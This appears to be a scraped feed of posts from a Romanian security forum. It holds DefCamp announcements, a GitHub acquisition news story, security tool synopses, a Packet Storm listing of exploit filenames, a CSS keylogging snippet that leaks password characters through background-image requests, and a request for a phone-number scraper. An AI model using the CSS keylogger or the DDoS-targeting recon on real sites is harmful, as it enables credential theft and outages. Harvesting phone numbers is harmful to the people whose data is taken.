Leaderboard

sau aia care sunt pe forum din 2012 si fac poza la desktop cu telefonul

Search for open source repisitories on github, gitlab, and bitbucket all at once. By Yoshiki Schmitz URL: https://bithublab.org/

Se pare ca s-au deschis inregistrarile pentru Defcamp 2018: https://def.camp/tickets/ De asemenea, va puteti inscrie la Call for Papers, daca doriti sa prezentati. https://def.camp/call-for-papers/ Daca sunt intrebari, va poate ajuta @Andrei

Here's the biggest news of the week—Microsoft has reportedly acquired GitHub for $7.5 billion. For those unaware, GitHub is a popular code repository hosting service that allows developers to host their projects, documentation, and code in the cloud using the popular Git source management system, invented in 2005 by Linux founder Linus Torvalds. GitHub is used by many developers and big tech companies including Apple, Amazon, Google, Facebook, and IBM to store their corporate code and privately collaborate on software, but Microsoft is one of the top contributors to the web-hosting service. Microsoft has uploaded several of its most important projects, including PowerShell, the .NET framework, and the Microsoft Edge JavaScript engine, to the website under open source licenses. Microsoft also partnered with Canonical to bring Ubuntu to Windows 10. Citing sources familiar with the matter, Bloomberg reports that GitHub opted to sell to Microsoft in part because it was impressed with the performance and leadership of Microsoft's CEO Satya Nadella, who has pushed the company to embrace open source technology. In a blog post published today, Microsoft has confirmed that will acquire GitHub for $7.5 billion in Microsoft stock, and the deal is expected to close by the end of 2018. "GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device." "Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub's current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives." GitHub was last valued at $2 billion in 2015. However, the decision has brought fear among some developers at open source community, with some Twitter users proclaiming the death of GitHub and open source software, and many considering to switch to rival services such as BitBucket or GitLab. The concern is completely rational and understandable. Despite the company's lack of a CEO and money woes, Github holds a privileged position in the software development ecosystem and plays a critical role. GitHub is, no doubt, a hub of the open source world, with 80 million code repositories hosted on the site as of March 2018. Microsoft, on the other hand, has once opposed to such open-source software development, with its ex-CEO Steve Ballmer describing Linux as "cancer." However, Nadella moved the company away from complete dependence on its Windows OS to more in-house development on Linux. Microsoft even brought Linux to Windows, via the Windows Subsystem for Linux. Microsoft's largest acquisition to date was LinkedIn, the job-oriented professional social network it acquired in 2015 for $26 billion, and many people are now concerned that the massive investment in LinkedIn will start to pay off for Microsoft. With both LinkedIn and GitHub, Microsoft is in a position to expand and strengthen LinkedIn. Also, the acquisition will give Microsoft access to a wealth of data and millions of software developers. https://thehackernews.com/2018/06/microsoft-acquires-github.html

As mai adauga si faptul ca pe langa inscrieri si CFP (care sunt foarte importante) mai avem si Call for Contests si Call for Volunteers (doua metode prin care se poate ajunge la def si prin care va puteti implica activ in organizarea unui concurs sau a aspectelor logistice). https://def.camp/call-for-contests-at-hacking-village/ https://def.camp/become-a-volunteer/

Safely scan for vulnerabilities on your Android phone or tablet Assess your mobile security risk Keep your carrier honest What is X-Ray? X-Ray allows you to scan your Android device for security vulnerabilities that put your device at risk. X-Ray was developed by the security experts at Duo Security. We hope that X-Ray will empower users with knowledge of vulnerabilities on their devices and allow them to take action to improve their security. We encourage users to contact their carriers and ask for their devices to be patched. Think your Android device is secure? X-Ray helps prove it to you. What does X-Ray do? X-Ray scans your Android device to determine whether there are vulnerabilities that remain unpatched by your carrier. The X-Ray app presents you with a list of vulnerabilities that it is able to identify and allows you to check for the presence of each vulnerability on your device. X-Ray has detailed knowledge about a class of vulnerabilities known as “privilege escalation” vulnerabilities. Such vulnerabilities can be exploited by a malicious application to gain root privileges on a device and perform actions that would normally be restricted by the Android operating system. A number of such vulnerabilities have been discovered in the core Android platform, affecting nearly all Android devices. Even more have been discovered in manufacturer-specific extensions that may affect a smaller subset of Android users. Unfortunately, many of these privilege escalation vulnerabilities remain unpatched on large populations of Android devices despite being several years old. Read more... Download: There are two ways of downloading X-Ray: On your phone or tablet, visit: xray.io/dl or Scan this barcode:

This archive contains all of the 282 exploits added to Packet Storm in May, 2018. Content: Directory of \1805-exploits\1805-exploits 04/06/2018 21:02 <DIR> . 04/06/2018 21:02 <DIR> .. 08/05/2018 15:44 4,190 2345sg37-dos.txt 15/05/2018 10:41 4,116 2345sg37nsprotect-dos.txt 04/05/2018 02:07 1,139 adobereaderpdf-inject.txt 21/05/2018 05:44 1,883 advsws10-xssxsrfsql.txt 20/05/2018 17:16 2,353 aem-exec.txt 22/05/2018 07:59 6,806 af_packet_chocobo_root_priv_esc.rb.txt 17/05/2018 21:42 6,665 af_packet_packet_set_ring_priv_esc.rb.txt 26/05/2018 23:24 1,209 ajaxffc20-sql.txt 28/05/2018 04:03 893 alftp531-overflow.txt 10/05/2018 10:56 801 allokvideosplitter311217-dos.txt 25/05/2018 03:22 3,173 androidos-disclose.txt 28/05/2018 18:32 3,937 appnitromachform-sqlshelltraversal.txt 03/05/2018 02:55 671 arastta162-xss.txt 24/05/2018 19:08 1,761 aspnetjvideokit-sql.txt 02/05/2018 05:53 16,237 asustorexploit-master.zip 22/05/2018 05:44 1,664 autocar12-sqlxss.txt 31/05/2018 21:06 1,439 axonpbx-dllhijack.txt 31/05/2018 21:07 737 axonpbx202-xss.txt 27/05/2018 09:22 885 babynamessearchengine10-sql.txt 14/05/2018 18:35 561 bbpress25-xss.txt 27/05/2018 20:32 1,109 bitmainantminer-exec.txt 04/05/2018 01:56 5,562 ble_norton_core-master.tgz 22/05/2018 02:02 2,445 boersede-xss.txt 27/05/2018 04:42 865 bookingwizzbookingsystem55-sql.txt 31/05/2018 21:09 5,584 brotherhl-xss.txt 31/05/2018 21:50 7,990 bypassuac_sluihijack.rb.txt 31/05/2018 21:11 537 chitasoft362-sql.txt 18/05/2018 13:22 2,210 ciscosa520w-traversal.txt 27/05/2018 10:22 1,624 clippercms133-xss.txt 28/05/2018 05:02 6,427 cloudmesyncseh-overflow.txt 04/05/2018 02:01 788,501 cod-exploit-master.tgz 04/05/2018 02:20 14,753 CORE-2018-0001.txt 31/05/2018 21:49 58,347 CORE-2018-0002.txt 31/05/2018 21:52 25,979 CORE-2018-0004.txt 15/05/2018 22:52 4,937 CSNC-2018-002.txt 15/05/2018 23:08 5,780 CSNC-2018-003.txt 04/05/2018 18:41 2,487 cspmysqlum231-sql.txt 31/05/2018 21:36 1,302 csvimportexport110-sqlxss.txt 11/05/2018 09:11 3,820 delltouchpad-dos.txt 07/05/2018 19:20 3,876 DEVICELOCK-PLUG-PLAY-AUDITOR-v5.72-UNICODE-BUFFER-OVERFLOW.txt 08/05/2018 16:43 7,312 dlinkdir868l-xsrf.txt 20/05/2018 17:15 3,664 dlinkdsl3782-bypass.txt 24/05/2018 19:45 3,138 dlink_dsl2750b_exec_noauth.rb.txt 27/05/2018 05:33 29,872 dolibarr700-exec.txt 27/05/2018 04:33 6,976 dolibarr700-sql.txt 27/05/2018 06:55 6,304 dolibarr700-xss.txt 28/05/2018 10:32 1,267 domainmod40903-xss.txt 18/05/2018 15:02 2,988 dynorootdhcp-exec.txt 26/05/2018 23:35 5,358 easybilling10-sqlxssxsrf.txt 24/05/2018 19:12 2,557 easyfileuploader17-shell.txt 22/05/2018 05:02 1,604 easyfileuploader17-sqlxss.txt 26/05/2018 23:26 610 easyletters10-sql.txt 20/05/2018 17:13 10,699 easympegdvdburner1711-overflow.txt 22/05/2018 17:02 3,678 easyservicebilling10-sqlxss.txt 09/05/2018 18:50 3,427 EHCP-v0.37.12.b-CLEARTEXT-PASSWORD-STORAGE.txt 09/05/2018 18:49 4,857 EHCP-v0.37.12.b-INSECURE-CRYPTO.txt 09/05/2018 18:48 3,661 EHCP-v0.37.12.b-MULTIPLE-CSRF.txt 09/05/2018 18:51 3,023 EHCP-v0.37.12.b-UNVERIFIED-PASSWORD-CHANGE.txt 09/05/2018 18:47 2,869 EHCP-v0.37.12.b-XSS-COOKIE-THEFT.txt 09/05/2018 18:46 3,869 EHCP-v0.37.12.b-XSS-FTP-BACKDOOR-ACCOUNT.txt 13/05/2018 22:41 971 emcrecoverpoint43-inject.txt 03/05/2018 02:30 1,924 emdb1711-overflow.txt 26/05/2018 23:32 1,422 employeeworkschedule59-sql.txt 28/05/2018 05:44 2,866 engelvoelkers-xss.txt 22/05/2018 10:22 554 erpnext11-xss.txt 24/05/2018 19:26 366 eumrvrcs1-sql.txt 21/05/2018 07:23 2,667 eventregoracle-xss.txt 24/05/2018 18:48 906 ewalletopg2-xsrf.txt 03/05/2018 02:38 2,924 eximbase64d-exec.txt 10/05/2018 11:03 1,789 fastgate00047-xsrf.txt 29/05/2018 15:32 1,805 fbclonescript105-sql.txt 29/05/2018 05:22 795 fbclonescript105-xsrf.txt 22/05/2018 04:02 1,253 fdfvffss110-xssxsrf.txt 03/05/2018 02:32 2,366 fdiskboss9116-xss.txt 02/05/2018 06:18 2,202 fdiskpulse107-xss.txt 03/05/2018 02:34 2,210 fdisksavvy107-xss.txt 03/05/2018 02:42 2,219 fdisksorter107-xss.txt 03/05/2018 02:40 2,211 fdupscout107-xss.txt 23/05/2018 00:02 601 feedyrssnt20-sql.txt 29/05/2018 14:33 2,756 foilchat-bypass.txt 02/05/2018 06:14 2,392 fsyncbreeze107-xss.txt 22/05/2018 16:55 4,195 ftpshell680-overflow.txt 08/05/2018 16:42 2,254 ftpshellclient67-overflow.txt 03/05/2018 02:41 2,277 fvxsearch107-xss.txt 24/05/2018 18:31 1,491 gigs20-sql.txt 21/05/2018 17:22 2,784 gitbucket4231-exec.tgz 24/05/2018 19:29 774 gnuglibc-overflow.txt 07/05/2018 19:23 3,720 gnuwget-inject.txt 04/05/2018 01:32 466 gpon-bypassinject.txt 24/05/2018 18:33 1,813 gpstracker10-sql.txt 31/05/2018 21:20 3,411 gridprobigdata10-sql.txt 01/05/2018 21:21 2,276 GS20180502034549.tgz 01/05/2018 15:22 26,067 GS20180502035150.txt 01/05/2018 16:55 2,393 GS20180502035423.tgz 01/05/2018 16:55 11,870 GS20180502040015.txt 04/05/2018 01:33 4,042 GS20180504014949.tgz 15/05/2018 22:55 2,904 GS20180515215502.tgz 18/05/2018 09:03 9,143 GS20180518080309.txt 18/05/2018 09:04 1,958 GS20180518080411.tgz 24/05/2018 18:39 10,245 GS20180524173919.tgz 24/05/2018 18:41 2,931 GS20180524174148.tgz 24/05/2018 18:42 2,703 GS20180524174255.tgz 24/05/2018 18:44 12,287 GS20180524174411.txt 24/05/2018 18:45 11,751 GS20180524174528.txt 31/05/2018 11:44 2,194 GS20180531204306.txt 18/05/2018 18:02 2,401 healwireop30-xssxsrf.txt 24/05/2018 18:51 902 honeywellscada-disclose.txt 24/05/2018 19:24 15,868 honeywellxl-sqlxss.txt 16/05/2018 23:03 1,223 horsemarket157-xsrf.txt 18/05/2018 15:44 4,009 hpeimc73-exec.rb.txt 07/05/2018 19:11 939 hwinfo582-dos.txt 14/05/2018 18:23 10,483 ibmflashsystemstorwize-filereadxsrf.txt 29/05/2018 20:32 26,755 ibmqradarsiem-exec.txt 04/05/2018 18:53 4,712 icewarpmailserver-traversal.txt 18/05/2018 14:22 1,217 imcas162-xsrf.txt 27/05/2018 05:44 342 ingenioussms-sql.txt 17/05/2018 21:25 2,983 intelbrasncloud30010-bypass.txt 16/05/2018 23:02 1,260 intenoiopsys20-exec.txt 22/05/2018 04:33 1,486 isocial120-xssxsrf.txt 29/05/2018 04:22 3,252 issuetrak70-sql.txt 28/05/2018 03:22 3,067 jdaconnect-execxsrf.txt 28/05/2018 02:11 32,636 jdawms-sqlxxeoverflowxsrf.txt 16/05/2018 23:17 13,829 jenkins_ldap_deserialize.rb.txt 20/05/2018 17:11 1,223 joomlaekrishta210-sqlxss.txt 28/05/2018 14:01 1,014 joomlafullsocial110-sql.txt 28/05/2018 05:44 2,331 joomlajcartopencart2302-xsrf.txt 28/05/2018 13:01 1,374 joomlajoomocshop10-xsrf.txt 22/05/2018 04:33 1,197 k2smartforms4611-ssrf.txt 25/05/2018 05:44 1,724 komseocart13-sql.txt 28/05/2018 15:02 293,376 libmobi03-disclose.tgz 24/05/2018 18:37 1,592 librarycms10-sql.txt 03/05/2018 02:36 6,524 libreopen-disclose.txt 13/05/2018 22:49 8,967 libuser_roothelper_priv_esc.rb.txt 24/05/2018 19:35 664 likesoftwarecms-shellxsrf.txt 04/05/2018 01:03 1,201 linux417afllc-doublefree.txt 27/05/2018 05:55 1,804 listinghubcms10-sql.txt 27/05/2018 04:04 411 lyrist-sql.txt 21/05/2018 06:22 1,908 mamhmg10-xssxsrfsql.txt 09/05/2018 19:03 3,814 mantisbt_manage_proj_page_rce.rb.txt 24/05/2018 18:30 675 mcard-xsrf.txt 24/05/2018 18:50 356 mcardmcsp1-sql.txt 21/05/2018 07:32 1,375 mergepacs70-xsrf.txt 22/05/2018 02:11 1,540 mermp53-xss.txt 15/05/2018 23:02 2,242 metronettm127-xsrf.txt 10/05/2018 11:05 1,983 modbupal16b-xxe.txt 15/05/2018 10:39 793 monstra304upload-exec.txt 18/05/2018 04:33 1,399 monstracms-xss.txt 20/05/2018 20:32 9,039 monstracms304stored-xss.txt 09/05/2018 18:52 3,193 MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt 04/05/2018 02:51 4,188 ms16_014_wmi_recv_notif.rb.txt 01/05/2018 14:13 2,599 msfd_rce_browser.rb.txt 01/05/2018 13:12 1,867 msfd_rce_remote.rb.txt 24/05/2018 19:39 10,746 msie11vbscript-exec.txt 25/05/2018 10:22 431,816 MSPaint_PoC.zip 13/05/2018 17:58 4,028 mswin2003sp2rras-exec.txt 16/05/2018 23:04 659 multiplebjocg25-xss.txt 16/05/2018 23:08 756 mybbadminnotes11-xsrf.txt 29/05/2018 05:22 645 mybbchanuondyu102-xss.txt 10/05/2018 11:08 793 mybblatestpostsprofile11-xss.txt 25/05/2018 06:55 640 mybbmoderatorln11-xss.txt 27/05/2018 12:11 1,140 mydirectory20-sqlxss.txt 20/05/2018 17:10 1,488 myscadamypro-hardcoded.txt 23/05/2018 11:11 6,975 mysqlblobuploader17-sqlxss.txt 23/05/2018 17:48 1,495 mysqlsmartreport10-sqlxss.txt 26/05/2018 23:25 2,204 mysurvey10-sql.txt 17/05/2018 21:20 1,582 nanopoolclaymoredualminer73-exec.txt 22/05/2018 11:32 1,286 newsbeecms14-sql.txt 24/05/2018 19:28 9,294 newsbeecms14-xsrf.txt 25/05/2018 03:22 2,776 newsbeecms14-xss.txt 22/05/2018 06:02 1,988 newsbeecms14download-sql.txt 31/05/2018 21:39 973 newstar21-sqlxss.txt 17/05/2018 21:10 1,781 nodaps40-sqlxsrf.txt 22/05/2018 07:22 1,678 nordexn149scada-sql.txt 22/05/2018 08:22 1,698 nordexn149wtws-sql.txt 27/05/2018 03:22 1,673 nuuonvrmini2-shell.txt 13/05/2018 22:40 1,487 openauditcom220-xss.txt 13/05/2018 18:03 1,590 openauditprof211-xss.txt 24/05/2018 19:10 1,203 opendaylight-sql.txt 25/05/2018 08:22 1,939 oraclewebcenter-access.txt 25/05/2018 02:11 2,810 oraclewebcenterfatwire-xss.txt 03/05/2018 03:07 2,799 oscommerce_installer_unauth_code_exec.rb.txt 24/05/2018 18:32 1,821 osscms10-sql.txt 31/05/2018 21:42 506 pagekitcms1013-xss.txt 08/05/2018 00:55 6,932 panos_readsessionvars.rb.txt 24/05/2018 19:36 1,405 paulnews10-sqlxss.txt 22/05/2018 15:02 963 paulpainrintcmsprinting10-sql.txt 25/05/2018 04:33 8,014,831 pdoSessionHandlerPoC.tgz 03/05/2018 01:32 5,434 peelshoppingcart900-xssxsrf.txt 24/05/2018 04:33 1,973 pespro197-bypass.txt 29/05/2018 03:33 7,427 phosdcumm.pl.txt 23/05/2018 18:18 3,869 phpdashboards45-sql.txt 31/05/2018 21:38 1,475 phpdashboardsnew55-sql.txt 24/05/2018 19:40 1,006 phplum410-shell.txt 10/05/2018 11:01 871 phpvirtualbox52-xsrfxss.txt 07/05/2018 19:15 6,459 playsms_filename_exec.rb.txt 07/05/2018 19:17 6,439 playsms_uploadcsv_exec.rb.txt 17/05/2018 21:18 2,378 powerlogicschneider-xsrf.txt 18/05/2018 14:02 2,175 prime95294b8-overflow.txt 22/05/2018 05:44 795 privatemessagephpscript20-xss.txt 14/05/2018 18:32 1,478 projectpier088-sqlbypass.txt 29/05/2018 14:02 1,159 psjf-exec.txt 22/05/2018 23:22 637 qnapps5-xss.txt 23/05/2018 00:03 39,325 qualys-procps-ng-audit-report.txt 22/05/2018 04:33 8,020 r344depbypass-overflow.txt 19/05/2018 07:48 6,275 rds_priv_esc.rb.txt 16/05/2018 23:05 1,116 rockwellscadasystem27011-xss.txt 25/05/2018 18:22 2,622 ruckusicx745048-xss.txt 14/05/2018 18:29 3,259 SA-20180501-0.txt 16/05/2018 23:20 10,380 SA-20180516-0.txt 29/05/2018 18:22 8,260 SA-20180529-0.txt 18/05/2018 15:32 1,422 sapb2bb2ccrm-lfi.txt 25/05/2018 07:22 2,572 sapits6200-sessionfixationxss.txt 18/05/2018 05:44 1,539 sapnetweaverwebdynpro-disclose.txt 24/05/2018 18:36 1,603 satcfdi33-sql.txt 21/05/2018 02:11 2,116 schneiderelectricplcs-xsrf.txt 30/05/2018 02:11 1,869 searchblox866-xsrf.txt 29/05/2018 12:11 502,867 SharepointUserEnumeration-180528-FullDisclosure.pdf 26/05/2018 23:54 662 sharetronixcms362-xsrf.txt 24/05/2018 18:34 1,614 shippingsystemcms10-sql.txt 24/05/2018 19:05 734 siemensscalances613-dos.txt 18/05/2018 12:11 861 siemenssimaticpanels-xsrfxss.txt 22/05/2018 10:22 541 siemenssimatics71200-xsrf.txt 22/05/2018 15:02 548 siemenssimatics71200-xss.txt 30/05/2018 03:22 574 siemenssimatics7300-dos.txt 16/05/2018 23:10 4,636 signal-htmlinject.txt 15/05/2018 10:47 4,086 signaldesktop-inject.txt 29/05/2018 05:22 4,305 sitemakinslac10-sql.txt 24/05/2018 19:03 1,562 sktltewifisdtcw3b1-bypass.txt 24/05/2018 18:36 1,657 smscms10-sql.txt 28/05/2018 04:03 2,640 softwareadvice10-xss.txt 16/05/2018 23:14 3,905 struts2_code_exec_showcase.rb.txt 17/05/2018 21:13 1,253 supercom-sqlxssxsrf.txt 22/05/2018 06:22 2,231 superfood10-xssxsrfsql.txt 22/05/2018 07:57 5,197 SYSS-2018-007.txt 31/05/2018 21:40 711 tacxenta-disclose.txt 04/05/2018 01:58 3,441 tbk-disclose.txt 25/05/2018 03:02 1,997 timbalitbang35-sql.txt 25/05/2018 02:11 1,996 timbalitbang35-xss.txt 24/05/2018 19:12 1,848 timber11-xsrf.txt 28/05/2018 10:32 7,861 tplinktlwr840n-bypass.txt 02/05/2018 05:38 2,558 tpshop208-backdoor.txt 03/05/2018 02:58 3,767 trovebox400rc6-bypassqlssrf.txt 16/05/2018 23:07 914 virtuemart3114-xss.txt 03/05/2018 01:01 4,455 watchguard-exec.txt 25/05/2018 04:33 1,979 wchatfrpacs15-shell.txt 21/05/2018 03:22 525 wchatphpajaxcs15-xss.txt 22/05/2018 05:44 428 websocketlc-xss.txt 24/05/2018 18:47 1,817 wecodexhotelcms10-sql.txt 24/05/2018 18:48 1,830 wecodexrestaurantcms10-sql.txt 24/05/2018 18:35 1,478 wecodexstorepaypal10-sql.txt 27/05/2018 06:02 3,012 werewolfonline088-disclose.txt 15/05/2018 23:04 20,729 whatsapp21831-memcorrupt.txt 25/05/2018 10:22 139,466 windscribe181-exec.txt 28/05/2018 05:02 1,706 witycms061-xss.txt 27/05/2018 18:02 3,103 wpbc300-sqlxss.txt 28/05/2018 14:33 2,414 wpeventscal-sql.txt 24/05/2018 19:07 1,372 wppeugeotmusic-shellxsrf.txt 01/05/2018 11:11 2,238 wprcc17-xss.txt 15/05/2018 10:46 2,889 wpulike31-delete.txt 15/05/2018 10:45 2,950 wpulike31-xss.txt 07/05/2018 19:19 8,084 wpure-escalate.rb.txt 12/05/2018 09:08 1,788 wpusergroups200-xsrf.txt 04/05/2018 18:51 1,899 wpwfcookieconsent113-xss.txt 13/05/2018 22:44 4,445 wuzhicms410-xss.txt 13/05/2018 10:33 778 xataboost100-sql.txt 01/05/2018 15:14 3,739 xdebug_unauth_exec.rb.txt 14/05/2018 18:37 6,635 xls2csv95-overflow.tgz 30/05/2018 10:32 906 yosoro104-exec.txt 22/05/2018 04:33 32,780 zenarcms-xsrfdisclose.txt 22/05/2018 03:22 1,550 zenarcms-xss.txt 21/05/2018 19:32 1,594 ZSL-2018-5460.txt 21/05/2018 15:44 3,311 ZSL-2018-5461.txt 22/05/2018 16:55 1,628 ZSL-2018-5462.txt 22/05/2018 11:11 1,028 ZSL-2018-5463.txt 22/05/2018 12:11 1,509 ZSL-2018-5464.txt 22/05/2018 15:44 886 ZSL-2018-5465.txt 22/05/2018 16:22 1,022 ZSL-2018-5466.txt 22/05/2018 13:02 1,383 ZSL-2018-5467.txt 23/05/2018 00:22 3,807 ZSL-2018-5468.txt 23/05/2018 00:22 2,451 ZSL-2018-5469.txt 29/05/2018 19:32 8,008 ZSL-2018-5470.tgz 30/05/2018 04:33 7,909 ZSL-2018-5471.tgz 283 File(s) 11,278,723 bytes Download: 1805-exploits.tgz (10 MB) Source

Synopsis: Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners, however when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA. Source: http://split-code.com/processdump.html (side-note: unul dintre cele mai interesante website-uri din punc de vedere al design-ului) GitHub Repository: https://github.com/glmcdona/Process-Dump Via:

Synopsis: The recent DDoS drama with Dyn has had me reading up on Domain Name Systems (DNS). Time and time again, bad guys have proved that one of the best ways to execute a successful Distributed Denial of Service (DDoS) is to hit DNS servers. As a pentester, name servers do come up a lot during assessments, especially during the reconnaissance phases. We still come across a few public name servers allowing zone transfers every now and then, which is always a treat, but I hardly ever look at DNS servers as an actual target. I still haven’t come across a client that’s actually willing to pay anyone to bring their services down. The DDoS against Dyn was particularly troublesome because Dyn is a major DNS provider and the attacks caused serious outages to a number of popular sites; Twitter, Paypal, Reddit, Github, Spotify and more. Which got me thinking; if I was a bad guy doing my recon, looking for the best name servers to hit, how would I go about it? Which name servers would I pick? Querying a domain for the name server(s) it uses is pretty straight forward, but if the name server was my target and a denial of service was my goal, I’d want to find out the opposite; how many domain names are using the target name server? Source: https://thevivi.net/2016/11/17/dnsnitch-reverse-ns-lookups-zone-transfers/ GitHub Repository: https://github.com/V1V1/DNSnitch Bonus: axfr.py - https://github.com/V1V1/axfr.py (script that takes a list of domains as input and attempts zone transfers on all of them against a specified name server)

Synopsis: As an emerging concept, the industry has yet to settle on a definitive definition of adversarial simulation, but it involves simulating [components of] targeted attacks in order to test both an organization’s instrumentation stacks and their ability to respond to the attack via their incident response process. This differs from Red Teaming in that adversarial simulation is typically a cooperative activity between the simulation runners and the simulation recipients with an end goal of validating defensive telemetry and testing incident response plans and playbooks. Raphael Mudge wrote a great blog post on the subject, which I recommend. Source: https://medium.com/uber-security-privacy/uber-security-metta-open-source-a8a49613b4a GitHub Repository: https://github.com/uber-common/metta

Synopsis: Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages. However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules. Whitepaper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html GitHub Repository: https://github.com/danielbohannon/Invoke-DOSfuscation Source:

Synopsis: A Scary Thought: I’ve worked in the Cyber Security space performing a wide breadth of penetration and red team services for years. Yes it’s still as easy (if not more so in this day and age!) to obtain Domain Admin “before lunch” as it was when I first started pen-testing. Back in September of 2013, Spider Labs wrote an article titled “Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network” This article is written to compliment and serve as a Part 2 of sorts to the original SpiderLabs Blog post. Link: https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Via:

Ideea de baza este folosirea selectorilor CSS pe baza de valori pentru a face request-uri fictive de background-image, cam asa input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Sursa: https://github.com/maxchehab/CSS-Keylogging

Link direct: https://www.hex-rays.com/products/ida/support/download_freeware.shtml

Pe mine ma interesa de cat Grand Theft Auto V .

Daca transferi primul iti dau eu PayPal !

Cumpar de 20$ una dintre monedele de mai jos plata paypal Bitcoin Ethereum Litecoin Bitcoin Cash Dogecoin Ripple Dash Golem Cardano CureCoin XEM Monero Zcash Factom Bytecoin STEEM Lisk EOS Gridcoin Ethereum Classic Cloud SETI Cloud Folding

Nu aveti bitcoin ?

Cumpăr 20$ Payeer ofer 25$ Paypal. Aștept mesaj .

am nevoie de un scrapper cv sa imi extraga numerele de mobil dupa un site anume , dau o bere